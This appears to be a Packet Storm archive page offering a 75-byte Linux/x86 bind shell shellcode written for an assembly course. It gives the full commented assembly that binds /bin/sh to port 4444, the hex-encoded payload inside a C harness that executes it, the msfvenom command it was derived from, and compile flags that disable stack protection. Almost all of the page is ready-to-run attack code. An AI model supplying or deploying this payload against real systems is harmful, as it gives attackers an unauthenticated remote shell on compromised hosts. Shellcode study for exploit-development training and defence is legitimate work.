all things security

Linux/x86 Bind Shell Shellcode

Linux/x86 Bind Shell Shellcode
Posted Jun 26, 2017
Authored by wetw0rk

75 bytes small Linux/x86 shellcode that binds a shell to port 4444. Contains no NULLs.

tags | shell, x86, shellcode
systems | linux
MD5 | 501256220065b8b18c393c129a24f35f

Linux/x86 Bind Shell Shellcode

Change Mirror Download
/*

Architecture : x86
OS : Linux
Author : wetw0rk
ID : SLAE-958
Shellcode Size : 75 bytes
Bind Port : 4444
Description : A linux/x86 bind shell via /bin/sh. Created by analysing msfvenom;
original payload was 78 bytes and contained 1 NULL. My shellcode
is 75 and contains 0 NULLS ;).

Original Metasploit Shellcode:
sudo msfvenom -p linux/x86/shell_bind_tcp -b "\x00" -f c --smallest -i 0

Test using:
gcc -fno-stack-protector -z execstack tshell.c

SECTION .text

global _start

_start:
; int socketcall(int call, unsigned long *args) remember to place backwards!
push 102 ; syscall for socketcall() 102
pop eax ; POP 102 into EAX
cdq ; EDX = 0 (saves space)
push ebx ; PUSH EBX(0) onto stack (IPPROTO_IP = 0)
inc ebx ; INC-rement EBX by 1
push ebx ; PUSH EBX(1) onto stack (SOCK_STREAM = 1)
push 2 ; PUSH 2 onto stack (AF_INET = 2)
mov ecx,esp ; top of stack contains our arguments save address in ECX
int 80h ; call that kernel!!

; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
pop ebx ; POP stack(2 = SYS_BIND = bind()) into EBX
pop esi ; POP stack(1) into ESI we dont need it
push edx ; PUSH EDX(0) onto the stack (INADDR_ANY = 0)
push word 0x5c11 ; PUSH 0x5c11 onto the stack (PORT:4444)
push edx ; PUSH 00 onto the stack
push byte 0x02 ; PUSH 02 onto the stack (AF_INET = 2)
push 16 ; PUSH 16 onto the stack (ADDRLEN = 16)
push ecx ; PUSH ECX(struct pointer) onto the stack
push eax ; PUSH EAX(socket file descriptor) onto stack
mov ecx,esp ; top of stack contains our argument array save it in ECX
mov al,102 ; syscall for socketcall() 102
int 80h ; call that kernel!!

; int listen(int sockfd, int backlog)
mov [ecx+4],eax ; zero out [ECX+4]
mov bl,4 ; MOV (4 = SYS_LISTEN = listen()) into BL
mov al,102 ; make syscall for socketcall()
int 80h ; call the kernel!!

; accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
inc ebx ; EBX(5) = SYS_ACCEPT = accept()
mov al,102 ; make syscall for socketcall()
int 80h ; call the kernel!!

xchg eax,ebx ; Put socket descriptor in EBX and 0x5 in EAX
pop ecx ; POP 3 into ECX for counter

loop:
; int dup2(int oldfd, int newfd)
mov al,63 ; syscall for dup2()
int 80h ; call the kernel!!
dec ecx ; count down to zero
jns loop ; If SF not set, ECX not negative so continue looping

done:
; int execve(const char *filename, char *const argv[], char *const envp[])
push dword 0x68732f2f ; PUSH hs// onto stack
push dword 0x6e69622f ; PUSH nib/ onto stack
mov ebx,esp ; put the address of "/bin//sh" into EBX via ESP
push eax ; PUSH nulls for string termination
mov ecx,esp ; store argv array into ECX via the stack or ESP
mov al,11 ; make execve() syscall or 11
int 80h ; call then kernel!!

*/

#include <stdio.h>
#include <string.h>

unsigned char code[]= \
"\x6a\x66\x58\x99\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5e\x52"
"\x66\x68\x11\x5c\x52\x6a\x02\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd"
"\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93"
"\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x89\xe1\xb0\x0b\xcd\x80";

int main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    16 Files
  • 17
    Oct 17th
    16 Files
  • 18
    Oct 18th
    14 Files
  • 19
    Oct 19th
    8 Files
  • 20
    Oct 20th
    7 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close